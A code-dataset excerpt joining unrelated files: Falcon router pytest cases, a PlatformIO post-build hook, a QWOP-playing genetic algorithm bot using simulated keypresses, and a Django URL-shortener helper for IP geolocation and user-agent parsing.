with pytest.raises(ValueError):
router.add_route(uri_template, ResourceWithId(-1))
@pytest.mark.parametrize('uri_template', [
'/repos/{org}/{repo}/compare/{simple_vs_complex}',
'/repos/{complex}.{vs}.{simple}',
'/repos/{org}/{repo}/compare/{complex}:{vs}...{complex2}/full',
])
def test_non_conflict(router, uri_template):
router.add_route(uri_template, ResourceWithId(-1))
@pytest.mark.parametrize('uri_template', [
# Missing field name
'/{}',
'/repos/{org}/{repo}/compare/{}',
'/repos/{complex}.{}.{thing}',
# Field names must be valid Python identifiers
'/{9v}',
'/{524hello}/world',
'/hello/{1world}',
'/repos/{complex}.{9v}.{thing}/etc',
'/{*kgriffs}',
'/{@kgriffs}',
'/repos/{complex}.{v}.{@thing}/etc',
'/{-kgriffs}',
'/repos/{complex}.{-v}.{thing}/etc',
'/repos/{simple-thing}/etc',
# Neither fields nor literal segments may not contain whitespace
'/this and that',
'/this\tand\tthat'
'/this\nand\nthat'
'/{thing }/world',
'/{thing\t}/world',
'/{\nthing}/world',
'/{th\ving}/world',
'/{ thing}/world',
'/{ thing }/world',
'/{thing}/wo rld',
'/{thing} /world',
'/repos/{or g}/{repo}/compare/{thing}',
'/repos/{org}/{repo}/compare/{th\ting}',
])
def test_invalid_field_name(router, uri_template):
with pytest.raises(ValueError):
router.add_route(uri_template, ResourceWithId(-1))
def test_print_src(router):
"""Diagnostic test that simply prints the router's find() source code.
Example:
$ tox -e py3_debug -- -k test_print_src -s
"""
print('\n\n' + router.finder_src + '\n')
def test_override(router):
router.add_route('/emojis/signs/0', ResourceWithId(-1))
resource, __, __, __ = router.find('/emojis/signs/0')
assert resource.resource_id == -1
def test_literal_segment(router):
resource, __, __, __ = router.find('/emojis/signs/0')
assert resource.resource_id == 12
resource, __, __, __ = router.find('/emojis/signs/1')
assert resource.resource_id == 13
resource, __, __, __ = router.find('/emojis/signs/42')
assert resource.resource_id == 14
resource, __, __, __ = router.find('/emojis/signs/42/small.jpg')
assert resource.resource_id == 23
route = router.find('/emojis/signs/1/small')
assert route is None
@pytest.mark.parametrize('path', [
'/teams',
'/emojis/signs',
'/gists',
'/gists/42',
])
def test_dead_segment(router, path):
route = router.find(path)
assert route is None
@pytest.mark.parametrize('path', [
'/repos/racker/falcon/compare/foo',
'/repos/racker/falcon/compare/foo/full',
])
def test_malformed_pattern(router, path):
route = router.find(path)
assert route is None
def test_literal(router):
resource, __, __, __ = router.find('/user/memberships')
assert resource.resource_id == 8
@pytest.mark.parametrize('path,expected_params', [
('/cvt/teams/007', {'id': 7}),
('/cvt/teams/1234/members', {'id': 1234}),
('/cvt/teams/default/members/700-5', {'id': 700, 'tenure': 5}),
(
'/cvt/repos/org/repo/compare/xkcd:353',
{'org': 'org', 'repo': 'repo', 'usr0': 'xkcd', 'branch0': 353},
),
(
'/cvt/repos/org/repo/compare/gunmachan:1234...kumamon:5678/part',
{
'org': 'org',
'repo': 'repo',
'usr0': 'gunmachan',
'branch0': 1234,
'usr1': 'kumamon',
'branch1': 5678,
}
),
(
'/cvt/repos/xkcd/353/compare/susan:0001/full',
{'org': 'xkcd', 'repo': '353', 'usr0': 'susan', 'branch0': 1},
)
])
def test_converters(router, path, expected_params):
__, __, params, __ = router.find(path)
assert params == expected_params
@pytest.mark.parametrize('uri_template', [
'/foo/{bar:int(0)}',
'/foo/{bar:int(num_digits=0)}',
'/foo/{bar:int(-1)}/baz',
'/foo/{bar:int(num_digits=-1)}/baz',
])
def test_converters_with_invalid_options(router, uri_template):
# NOTE(kgriffs): Sanity-check that errors are properly bubbled up
# when calling add_route(). Additional checks can be found
# in test_uri_converters.py
with pytest.raises(ValueError, match='Cannot instantiate converter') as e:
router.add_route(uri_template, ResourceWithId(1))
assert e.value.__cause__ is not None
@pytest.mark.parametrize('uri_template', [
'/foo/{bar:}',
'/foo/{bar:unknown}/baz',
])
def test_converters_malformed_specification(router, uri_template):
with pytest.raises(ValueError):
router.add_route(uri_template, ResourceWithId(1))
def test_variable(router):
resource, __, params, __ = router.find('/teams/42')
assert resource.resource_id == 6
assert params == {'id': '42'}
__, __, params, __ = router.find('/emojis/signs/stop')
assert params == {'id': 'stop'}
__, __, params, __ = router.find('/gists/42/raw')
assert params == {'id': '42'}
__, __, params, __ = router.find('/images/42.gif')
assert params == {'id': '42'}
def test_single_character_field_name(router):
__, __, params, __ = router.find('/item/1234')
assert params == {'q': '1234'}
@pytest.mark.parametrize('path,expected_id', [
('/teams/default', 19),
('/teams/default/members', 7),
('/cvt/teams/default', 31),
('/cvt/teams/default/members/1234-10', 32),
('/teams/1234', 6),
('/teams/1234/members', 7),
('/gists/first', 20),
('/gists/first/raw', 18),
('/gists/first/pdf', 21),
('/gists/1776/pdf', 21),
('/emojis/signs/78', 13),
('/emojis/signs/78/small.png', 24),
('/emojis/signs/78/small(png)', 25),
('/emojis/signs/78/small_png', 26),
])
def test_literal_vs_variable(router, path, expected_id):
resource, __, __, __ = router.find(path)
assert resource.resource_id == expected_id
@pytest.mark.parametrize('path', [
# Misc.
'/this/does/not/exist',
'/user/bogus',
'/repos/racker/falcon/compare/johndoe:master...janedoe:dev/bogus',
# Literal vs variable (teams)
'/teams',
'/teams/42/members/undefined',
'/teams/42/undefined',
'/teams/42/undefined/segments',
'/teams/default/members/undefined',
'/teams/default/members/thing/undefined',
'/teams/default/members/thing/undefined/segments',
'/teams/default/undefined',
'/teams/default/undefined/segments',
# Literal vs. variable (converters)
'/cvt/teams/default/members', # 'default' can't be converted to an int
'/cvt/teams/NaN',
'/cvt/teams/default/members/NaN',
# Literal vs variable (emojis)
'/emojis/signs',
'/emojis/signs/0/small',
'/emojis/signs/0/undefined',
'/emojis/signs/0/undefined/segments',
'/emojis/signs/20/small',
'/emojis/signs/20/undefined',
'/emojis/signs/42/undefined',
'/emojis/signs/78/undefined',
])
def test_not_found(router, path):
route = router.find(path)
assert route is None
def test_subsegment_not_found(router):
route = router.find('/emojis/signs/0/x')
assert route is None
def test_multivar(router):
resource, __, params, __ = router.find('/repos/racker/falcon/commits')
assert resource.resource_id == 4
assert params == {'org': 'racker', 'repo': 'falcon'}
resource, __, params, __ = router.find('/repos/racker/falcon/compare/all')
assert resource.resource_id == 11
assert params == {'org': 'racker', 'repo': 'falcon'}
@pytest.mark.parametrize('url_postfix,resource_id', [
('', 5),
('/full', 10),
('/part', 15),
])
def test_complex(router, url_postfix, resource_id):
uri = '/repos/racker/falcon/compare/johndoe:master...janedoe:dev'
resource, __, params, __ = router.find(uri + url_postfix)
assert resource.resource_id == resource_id
assert (params == {
'org': 'racker',
'repo': 'falcon',
'usr0': 'johndoe',
'branch0': 'master',
'usr1': 'janedoe',
'branch1': 'dev',
})
@pytest.mark.parametrize('url_postfix,resource_id,expected_template', [
('', 16, '/repos/{org}/{repo}/compare/{usr0}:{branch0}'),
('/full', 17, '/repos/{org}/{repo}/compare/{usr0}:{branch0}/full')
])
def test_complex_alt(router, url_postfix, resource_id, expected_template):
uri = '/repos/falconry/falcon/compare/johndoe:master' + url_postfix
resource, __, params, uri_template = router.find(uri)
assert resource.resource_id == resource_id
assert (params == {
'org': 'falconry',
'repo': 'falcon',
'usr0': 'johndoe',
'branch0': 'master',
})
assert uri_template == expected_template
def test_options_converters_set(router):
router.options.converters['spam'] = SpamConverter
router.add_route('/{food:spam(3, eggs=True)}', ResourceWithId(1))
resource, __, params, __ = router.find('/spam')
assert params == {'food': 'spam&eggs, spam&eggs, spam&eggs'}
@pytest.mark.parametrize('converter_name', [
'spam',
'spam_2'
])
def test_options_converters_update(router, converter_name):
router.options.converters.update({
'spam': SpamConverter,
'spam_2': SpamConverter,
})
template = '/{food:' + converter_name + '(3, eggs=True)}'
router.add_route(template, ResourceWithId(1))
resource, __, params, __ = router.find('/spam')
assert params == {'food': 'spam&eggs, spam&eggs, spam&eggs'}
@pytest.mark.parametrize('name', [
'has whitespace',
'whitespace ',
' whitespace ',
' whitespace',
'funky$character',
'42istheanswer',
'with-hyphen',
])
def test_options_converters_invalid_name(router, name):
with pytest.raises(ValueError):
router.options.converters[name] = object
def test_options_converters_invalid_name_on_update(router):
with pytest.raises(ValueError):
router.options.converters.update({
'valid_name': SpamConverter,
'7eleven': SpamConverter,
})
``` |
{
"source": "5orenso/nodemcu-mqtt-home-sensors",
"score": 2
} |
#### File: 5orenso/nodemcu-mqtt-home-sensors/add_build_hooks.py
```python
Import("env", "projenv")
my_flags = env.ParseFlags(env['BUILD_FLAGS'])
defines = {k: v for (k, v) in my_flags.get("CPPDEFINES")}
# access to global build environment
# print("GLOBAL ENV")
# print(env)
# access to project build environment (is used source files in "src" folder)
# print("PROJECT ENV")
# print(projenv)
#
# Dump build environment (for debug purpose)
# print(env.Dump())
# print(defines.get("VERSION"));
def after_build(source, target, env):
# print(source[0]);
# print(target[0]);
# print(env["PIOENV"]);
# do some actions
# after_build(["buildprog"], [".pio/build/nodemcuv2_nystuen/firmware.bin"])
version = defines.get("VERSION");
environment = env["PIOENV"];
firmware = str(source[0]);
# print(version);
# print(environment);
# print(firmware);
execute_string = ' '.join(["bash", "./after_build_hook.sh", "--firmware", firmware, "--version", version, "--environment", environment]);
# print(execute_string);
env.Execute(execute_string);
env.AddPostAction("buildprog", after_build)
``` |
{
"source": "5outh/autoqwop",
"score": 2
} |
#### File: autoqwop/src/autoqwopper.py
```python
import ImageGrab
import Image
import os
import time
from random import *
import win32api, win32con
import threading
from pytesser import *
from deap import base
from deap import creator
from deap import tools
import numpy
import math
import pickle
import sys
# Globals
LB_FILE = open('../logbook.pickle', 'w+')
# DEAP stuff
IND_SIZE = 5 #number of key presses
POP_SIZE = 1 #number of individuals
T_SIZE = 3 #tournament size
generations = 1000 #number of generations
selb = 1 #how many individuals to select when you call toolbox.selectBest
selw = 5 #how many individuals to select whe nyou call toolbox.selectWorst
# QWOP stuff
# Bounding box for QWOP
start_x, start_y = 9, 105
end_x, end_y = 640 + start_x, 400 + start_y
frame = (start_x, start_y, end_x, end_y)
# Bounding box for the "metres" dialogue box
metres_start_x, metres_start_y = 170, 24
metres_end_x, metres_end_y = 413, 50
metres_box = (metres_start_x, metres_start_y, metres_end_x, metres_end_y)
# x, y coordinate of the ribbon that pops up when you die
ribbon_x, ribbon_y = 155, 125
ribbon_pixel = (ribbon_x, ribbon_y)
# QWOP codes
QWOP_CODE = {
'P': (False, False, False, False),
'D': (False, False, False, True),
'C': (False, False, True, False),
'J': (False, False, True, True),
'B': (False, True, False, False),
'I': (False, True, False, True),
'H': (False, True, True, False),
'N': (False, True, True, True),
'A': (True, False, False, False),
'G': (True, False, False, True),
'F': (True, False, True, False),
'M': (True, False, True, True),
'E': (True, True, False, False),
'L': (True, True, False, True),
'K': (True, True, True, False),
'O': (True, True, True, True),
None: (False, False, False, False)
}
# Key codes
VK_CODE = {
'SPACE':0x20,
'O':0x4F,
'P':0x50,
'Q':0x51,
'W':0x57
}
def sendKey(key, duration=0.1, up=True):
win32api.keybd_event(key, 0, 0, 0)
time.sleep(duration)
if(up):
win32api.keybd_event(key, 0, win32con.KEYEVENTF_KEYUP, 0)
def leftClick(coords, duration=0.1, up=True):
win32api.SetCursorPos((start_x + coords[0], start_y + coords[1]))
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,0,0)
time.sleep(duration)
if (up):
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,0,0)
def sendKeys(keys):
"""
Send a list of (key, duration) pairs concurrently
"""
threads = []
for (key, duration, up) in keys:
t = threading.Thread(target=sendKey, args=(VK_CODE[key], duration, up))
threads.append(t)
for thread in threads:
thread.start()
def sendQwopCode(key, next=None):
"""
Send a QWOP-encoded key to the game.
"""
(q, w, o, p) = QWOP_CODE[key]
(_q, _w, _o, _p) = QWOP_CODE[next]
keys = []
if q:
keys.append(('Q', 0.15, True))
if w:
keys.append(('W', 0.15, True))
if o:
keys.append(('O', 0.15, True))
if p:
keys.append(('P', 0.15, True))
# Send the keys
sendKeys(keys)
# wait for them to finish before moving on to the next one
time.sleep(0.15)
def getRandomQwopString(numChars=5):
qwopString = ""
for i in xrange(numChars):
qwopString += chr(randint(65, 80))
return qwopString
class AutoQwopper:
def __init__(self):
self.update()
def getMetres(self):
metres = float(image_to_string(self.metres_frame)[:-9].replace(' ', ''))
self.metres = metres
def update(self):
self.qwop_frame = ImageGrab.grab(frame)
self.metres_frame = self.qwop_frame.crop(metres_box)
self.getMetres()
def die(self):
print('Killing qwopper.')
sendKey(VK_CODE['Q'], duration=1.5)
sendKey(VK_CODE['W'], duration=1.5)
def isDead(self):
return (self.qwop_frame.getpixel(ribbon_pixel) == (255, 255, 0))
def beginGame(self):
leftClick((100, 100))
def restartGame(self):
sendKey(VK_CODE['SPACE'])
def run(self, qwopString):
self.beginGame()
if (self.isDead()):
# restart game if this isn't the first time playing
self.restartGame()
self.update()
self.getMetres()
print ("Evaluating qwop string: " + "".join(qwopString))
start = time.time()
running = True
while running:
for qwopCode, next in zip(qwopString, qwopString[1:] + [None]):
sendQwopCode(qwopCode, next)
self.update()
if (self.isDead()):
running = False
# Set fitness to 0 if crashed
# self.metres = 0
print("Qwopper died")
break
if (time.time() - start > 60):
running = False
print("Time exceeded")
# Do one final update
time.sleep(0.5)
self.update()
break
if (not self.isDead()):
self.die()
print ("Went a total of " + str(self.metres) + " metres before dying.")
time.sleep(2)
return self.metres
# The main GA
def evaluate(ind):
qwopper = AutoQwopper()
return qwopper.run(ind),
def generateGene():
#generate a gene
return chr(randint(65, 80))
def mutate(ind):
#select a random character and randomize it
#mutation as described in google's paper
ind[randint(0, len(ind)-1)] = chr(randint(65, 80))
return ind
toolbox = base.Toolbox()
creator.create("FitnessMax", base.Fitness, weights=(1.0,))
creator.create("Individual", list, fitness = creator.FitnessMax)
toolbox.register("individual", tools.initRepeat, creator.Individual, generateGene, n=IND_SIZE)
toolbox.register("select", tools.selTournament, k=2, tournsize=T_SIZE)
toolbox.register("onePoint", tools.cxOnePoint)
toolbox.register("twoPoint", tools.cxTwoPoint)
toolbox.register("selectBest", tools.selBest, k=selb)
toolbox.register("selectWorst", tools.selWorst, k=selw)
# GENERATE STATISTICS
stats = tools.Statistics(key=lambda ind: ind.fitness.values)
hallOfFame = tools.HallOfFame(1)
logbook = tools.Logbook()
stats.register('max', max)
stats.register('min', min)
stats.register('mean', numpy.mean)
def updateStatistics(population, generation):
hallOfFame.update(population)
record = stats.compile(population)
record['best'] = "".join(hallOfFame[0])
record['generation'] = generation
logbook.record(**record)
pickle.dump(logbook, LB_FILE)
def main():
population = [toolbox.individual() for i in range(POP_SIZE)] #generate population
for i in range(len(population)):
#evaluate populations
population[i].fitness.values = evaluate(population[i])
for i in range(generations):
updateStatistics(population, i)
selected = toolbox.select(population) #select
parent1 = toolbox.clone(selected[0])
parent2 = toolbox.clone(selected[1])
child = toolbox.onePoint(parent1, parent2)[0] #crossover
child = mutate(child)
child.fitness.values = evaluate(child) #evaluate child
population.remove(choice(toolbox.selectWorst(population))) #survivor select
population.append(child) #replacement
def runOne(qwopString):
autoQwopper = AutoQwopper()
autoQwopper.run(qwopString)
if __name__ == '__main__':
if (len(sys.argv) > 1):
print ("Running a single genotype.")
runOne(list(sys.argv[1]))
else:
main()
```
#### File: autoqwop/src/quickGrab.pyw
```python
import ImageGrab
import Image
import os
import time
start_x, start_y = 9, 105
end_x, end_y = 640 + start_x, 400 + start_y
metres_start_x, metres_start_y = 170, 24
metres_end_x, metres_end_y = 413, 50
def screenGrab():
box = (start_x, start_y, end_x, end_y)
im = ImageGrab.grab(box)
impath = os.getcwd() + '\\qwop\\qwop__' + str(int(time.time())) + '.png'
im.save(impath, 'PNG')
box = (metres_start_x, metres_start_y, metres_end_x, metres_end_y)
metres = im.crop(box)
metres_path = impath[:-4] + '_metres.png'
metres.save(metres_path, 'PNG')
def main():
screenGrab()
if __name__ == '__main__':
main()
``` |
{
"source": "5parkp1ug/djLinkShortener",
"score": 2
} |
#### File: backend/shortener/ip_info_service.py
```python
import logging
import requests
from django.conf import settings
from user_agents import parse
logger = logging.getLogger(__name__)
class IPGeoInfo:
"""
Handles geo and user-agent info
"""
def __init__(self, ip, user_agent):
self.ip = ip
self.user_agent = user_agent
self.data = None
self.info()
def _fetch_data_from_api(self):
"""Method to get data from IPGepLocation.io(https://ipgeolocation.io/) API"""
params = {
'excludes': 'continent_code,country_code2,country_code3,is_eu,languages,geoname_id',
'apiKey': settings.IP_GEO_LOCATION_API_KEY,
'ip': self.ip
}
url = 'https://api.ipgeolocation.io/ipgeo'
response = requests.get(url, params=params)
if response.status_code == 200:
self.data = response.json()
else:
logger.warning(f'HTTP Get Request Failed: status_code={response.status_code}, response={response.json()}')
self.data = {}
def _parse_user_agent(self):
ua = parse(self.user_agent)
self.data['user_agent'] = {
'ua': ua.__str__(),
'browser_family': ua.browser.family,
'browser_version': ua.browser.version_string,
'os_family': ua.os.family,
'os_version': ua.os.version_string,
'device_family': ua.device.family,
'device_brand': ua.device.brand,
'device_model': ua.device.model,
'is_mobile': ua.is_mobile,
'is_pc': ua.is_pc,
'is_tablet': ua.is_tablet,
'is_touch_capable': ua.is_touch_capable,
'is_bot': ua.is_bot,
}
def info(self):
logger.debug(f'IP: {self.ip} & UA: {self.user_agent}')
self._fetch_data_from_api()
self._parse_user_agent()
return self.data
``` |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.